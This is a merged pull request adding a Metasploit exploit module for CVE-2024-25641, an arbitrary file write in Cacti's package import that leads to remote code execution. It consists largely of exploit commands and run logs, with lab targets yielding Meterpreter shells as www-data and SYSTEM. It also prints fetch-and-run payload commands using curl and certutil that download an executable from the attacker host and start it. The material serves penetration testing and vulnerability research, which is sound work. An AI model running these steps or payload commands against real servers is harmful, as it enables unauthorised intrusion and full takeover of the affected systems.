### PR TITLE
Cacti import package RCE (CVE-2024-25641)

### PR DESCRIPTION
**Pull request by cdelafuente-r7**
This exploit module leverages an arbitrary file write vulnerability (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It abuses the `Import Packages` feature to upload a specially crafted package that embeds a PHP file. Cacti will extract this file to an accessible location. The module finally triggers the payload to execute arbitrary PHP code in the context of the user running the web server.

Authentication is needed and the account must have access to the `Import Packages` feature. This is granted by setting the `Import Templates` permission in the `Template Editor` section.

This also adds a new mixin with some common helpers for Cacti. ~I will update the existing Cacti modules to use this mixin in a separate PR.~ I went ahead and updated `modules/exploits/multi/http/cacti_pollers_sqli_rce.rb`.

## Installation
See module documentation for step-by-step installation instructions on Linux (via Docker) and on Windows.

### Setup a new user
- Login with the `admin` user (password: `admin`)
- Go to `Configuration` > `Users`
- Click on the `+` sign
- Enter the `User Name`, `Password` and check the `Enabled` option.
- Click `Create`
- Go to the `Permissions` tab and set the `Import Templates` permission in `Template Editor`
- Click `Save`

## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use multi/http/cacti_package_import_rce`
1. Do: `set target <target>`
1. Do: `run rhost=<target address> rport=<target port> lhost=<local address> username=<username> password=<password>`
1. You should get a shell.

`modules/exploits/multi/http/cacti_pollers_sqli_rce.rb` can be tested following the original [PR](https://github.com/rapid7/metasploit-framework/pull/18769) instructions. Note that a version prior to 1.2.26 is needed to test it, which should also be vulnerable to the import package RCE.

### Cacti version 1.2.26 on Docker installation
- Target 0 (PHP)
```
msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=127.0.0.1 rport=8080 lhost=192.168.101.1 username=msfuser password=12345678

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `msfuser` and password `12345678`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 192.168.101.1
[+] Deleted /var/www/html/cacti/resource/jGbP1O.php
[*] Meterpreter session 1 opened (192.168.101.1:4444 -> 192.168.101.1:62197) at 2024-05-22 15:28:24 +0200

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : 087c6bbb8c7d
OS          : Linux 087c6bbb8c7d 6.6.22-linuxkit #1 SMP PREEMPT_DYNAMIC Fri Mar 29 12:23:08 UTC 2024 x86_64
Meterpreter : php/linux
```

- Target 1 (Linux Command)
```
msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=127.0.0.1 rport=8080 lhost=192.168.101.1 username=msfuser password=12345678

[*] Command to run on remote host: curl -so ./AynGghlaARy http://192.168.101.1:8080/DETWAARvN-XS_WA2cHnmIg; chmod +x ./AynGghlaARy; ./AynGghlaARy &
[*] Fetch handler listening on 192.168.101.1:8080
[*] HTTP server started
[*] Adding resource /DETWAARvN-XS_WA2cHnmIg
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `msfuser` and password `12345678`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Client 192.168.101.1 requested /DETWAARvN-XS_WA2cHnmIg
[*] Sending payload to 192.168.101.1 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.101.1
[+] Deleted /var/www/html/cacti/resource/R4imZxgqN.php
[+] Deleted /var/www/html/cacti/resource/AynGghlaARy
[*] Meterpreter session 3 opened (192.168.101.1:4444 -> 192.168.101.1:62224) at 2024-05-22 15:29:31 +0200

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.19.0.3
OS           : Debian 11.5 (Linux 6.6.22-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

### Cacti version 1.2.26 on Windows Server 2019
- Target 0 (PHP)
```
msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=192.168.101.124 lhost=192.168.101.1 username=msfuser password=12345678

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `msfuser` and password `12345678`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 192.168.101.124
[+] Deleted C:/Apache24/htdocs/cacti/resource/WPo04nIf.php
[*] Meterpreter session 2 opened (192.168.101.1:4444 -> 192.168.101.124:54654) at 2024-05-22 15:28:56 +0200

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : DC02
OS          : Windows NT DC02 10.0 build 17763 (Windows Server 2019) AMD64
Meterpreter : php/windows
```

- Target 2 (Windows Command)
```
msf6 exploit(multi/http/cacti_package_import_rce) > exploit verbose=true rhosts=192.168.101.124 lhost=192.168.101.1 username=msfuser password=12345678

[*] Command to run on remote host: certutil -urlcache -f http://192.168.101.1:8080/Qy-qOX10kZIXJGk3Q336Lg %TEMP%\cpOhjtfIddh.exe & start /B %TEMP%\cpOhjtfIddh.exe
[*] Fetch handler listening on 192.168.101.1:8080
[*] HTTP server started
[*] Adding resource /Qy-qOX10kZIXJGk3Q336Lg
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `msfuser` and password `12345678`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Client 192.168.101.124 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.101.124 (Microsoft-CryptoAPI/10.0)
[*] Client 192.168.101.124 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.101.124 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 192.168.101.124
[+] Deleted C:/Apache24/htdocs/cacti/resource/9PxU2R.php
[*] Meterpreter session 4 opened (192.168.101.1:4444 -> 192.168.101.124:54669) at 2024-05-22 15:30:20 +0200
[!] This exploit may require manual cleanup of 'C:/Apache24/htdocs/cacti/resource/cpOhjtfIddh' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DC02
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 9
Meterpreter     : x64/windows
```

### CODE REVIEW

File: modules/exploits/multi/http/cacti_package_import_rce.rb [hunk 1]
```diff
@@ -0,0 +1,313 @@
...
+          ],
+          [
+            'Linux Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => [ 'unix', 'linux' ],
+              'DefaultOptions' => {
+                # Payload is not set automatically when selecting this target.
+                # Select a x64 fetch payload by default.
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
```
Comment (bwatters-r7) [inline modules/exploits/multi/http/cacti_package_import_rce.rb:67]:
```suggestion
                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
```

File: modules/exploits/multi/http/cacti_package_import_rce.rb [hunk 2]
```diff
@@ -0,0 +1,313 @@
...
+          ],
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'win',
+              'DefaultOptions' => {
+                # Payload is not set automatically when selecting this target.
+                # Select a x64 fetch payload by default.
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'
```
Comment (bwatters-r7) [inline modules/exploits/multi/http/cacti_package_import_rce.rb:79]:
```suggestion
                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp'
```

**Review by jheysel-r7 — COMMENTED** [review]
Thank you @cdelafuente-r7! For the great module, for taking the time to write a Cacti mixin and for refactoring the previous `cacti_pollers_sqli_rce` module to use the new mixin. Everything looks great. 

I just had two minor suggestions. Testing was as expected - I found it interesting when testing on Windows the output of the `getuid` command differs slightly depending on what payload you use `Server username: NT AUTHORITY\SYSTEM` vs `Server username: SYSTEM` but double checked that is to be expected 👍 


### Testing
#### Target 0 (PHP) Linux
```
msf6 exploit(multi/http/cacti_package_import_rce) > run rhosts=172.16.199.131 lhost=172.16.199.1 username=admin password=admin verbose=true rport=8080 targeturi=/cacti/

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `admin`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 172.16.199.131
[+] Deleted /var/www/html/cacti/resource/93qdMXFw.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.131:55174) at 2024-06-10 08:38:42 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : a1f9b9a4594d
OS          : Linux a1f9b9a4594d 6.5.0-35-generic #35~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue May  7 09:00:52 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >
```

#### Target 1 (CMD) Linux
```
View the full module info with the info, or info -d command.

msf6 exploit(multi/http/cacti_package_import_rce) > run rhosts=172.16.199.131 lhost=172.16.199.1 username=admin password=admin verbose=true rport=8080 targeturi=/cacti/

[*] Command to run on remote host: curl -so ./ENWrCtwQ http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA; chmod +x ./ENWrCtwQ; ./ENWrCtwQ &
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `admin`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Client 172.16.199.131 requested /Hn-8qIL46e0vZdQpIHPToA
[*] Sending payload to 172.16.199.131 (curl/7.74.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.16.199.131
[+] Deleted /var/www/html/cacti/resource/uNIjp5GYS.php
[+] Deleted /var/www/html/cacti/resource/ENWrCtwQ
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:58464) at 2024-06-10 08:42:11 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 172.19.0.3
OS           : Debian 11.5 (Linux 6.5.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

#### Target 0 (PHP) Windows
```
msf6 exploit(multi/http/cacti_package_import_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `ba72fe0d5bd95b8`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Sending stage (39927 bytes) to 172.16.199.132
[+] Deleted C:/Apache24/htdocs/cacti/resource/rSSVR5F.php
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.132:52225) at 2024-06-10 11:04:28 -0700

meterpreter > getuid
Server username: SYSTEM
meterpreter > sysinfo
Computer    : DESKTOP-N3ORU31
OS          : Windows NT DESKTOP-N3ORU31 10.0 build 19045 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >
```

#### Target 2 Windows (CMD) Windows 
```
msf6 exploit(multi/http/cacti_package_import_rce) > run

[*] Command to run on remote host: certutil -urlcache -f http://172.16.199.1:8080/-LHoYC22ccefBZaLFchCEQ %TEMP%\VSuygfQDMnb.exe & start /B %TEMP%\VSuygfQDMnb.exe
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /-LHoYC22ccefBZaLFchCEQ
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Cacti version
[+] The web server is running Cacti version 1.2.26
[*] Attempting login with user `admin` and password `ba72fe0d5bd95b8`
[+] Logged in
[*] Checking permissions to access `package_import.php`
[+] The target appears to be vulnerable.
[*] Uploading the package
[*] Triggering the payload
[*] Client 172.16.199.132 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.132 (Microsoft-CryptoAPI/10.0)
[*] Client 172.16.199.132 requested /-LHoYC22ccefBZaLFchCEQ
[*] Sending payload to 172.16.199.132 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 172.16.199.132
[+] Deleted C:/Apache24/htdocs/cacti/resource/KC5iUx.php
[*] Meterpreter session 5 opened (172.16.199.1:4444 -> 172.16.199.132:52457) at 2024-06-10 11:57:35 -0700
[!] This exploit may require manual cleanup of 'C:/Apache24/htdocs/cacti/resource/VSuygfQDMnb' on the target

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-N3ORU31
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
```

File: documentation/modules/exploit/multi/http/cacti_package_import_rce.md [hunk 3]
```diff
@@ -0,0 +1,284 @@
...
+$database_password = 'root';
+$database_port     = '3306';
+$database_retries  = 5;
+$database_ssl      = false;
+$database_ssl_key  = '';
+$database_ssl_cert = '';
+$database_ssl_ca   = '';
+$database_persist  = false;
+$poller_id = 1;
+$url_path = '/cacti';
```
[the remark this answers is not in the document]
Comment (cdelafuente-r7) [reply documentation/modules/exploit/multi/http/cacti_package_import_rce.md:106]: You're absolutely right, I actually changed this in my environment but I forgot to update the documentation. Sorry about that.

File: modules/exploits/multi/http/cacti_package_import_rce.rb [hunk 4]
```diff
@@ -0,0 +1,313 @@
...
+          'Christophe De La Fuente' # Metasploit module
+        ],
+        'References' => [
+          [ 'URL', 'https://karmainsecurity.com/KIS-2024-04'],
+          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88'],
+          [ 'CVE', '2024-25641']
+        ],
+        'Platform' => ['unix linux win'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
```
[the remark this answers is not in the document]
Comment (cdelafuente-r7) [reply modules/exploits/multi/http/cacti_package_import_rce.rb:44]: Sounds like a good idea. I'm not sure if there is any consequence of not having it, but for consistency, I'll add the `ARCH_PHP`. Thanks for the heads up!

**Comment by cdelafuente-r7** [comment]
Thanks @jvoisin , @bwatters-r7 and @jheysel-r7 for your review. I believe I've addressed everything in [56c2310](https://github.com/rapid7/metasploit-framework/pull/19196/commits/56c23107184bada53ca24e69d37a82c167f398ba).

**Comment by jheysel-r7** [comment]
# Release Notes

This exploit module leverages an arbitrary file write vulnerability (CVE-2024-25641) in Cacti versions prior to 1.2.27 to achieve RCE. It abuses the Import Packages feature to upload a specially crafted package that embeds a PHP file.

**Comment by jheysel-r7** [comment]
> Thanks @jvoisin , @bwatters-r7 and @jheysel-r7 for your review. I believe I've addressed everything in [45815a4](https://github.com/rapid7/metasploit-framework/pull/19196/commits/45815a4cb55180bc841a4c03d543c7a2673c8213).

Thanks @cdelafuente-r7! Retested and landed :)

**Pull request merged**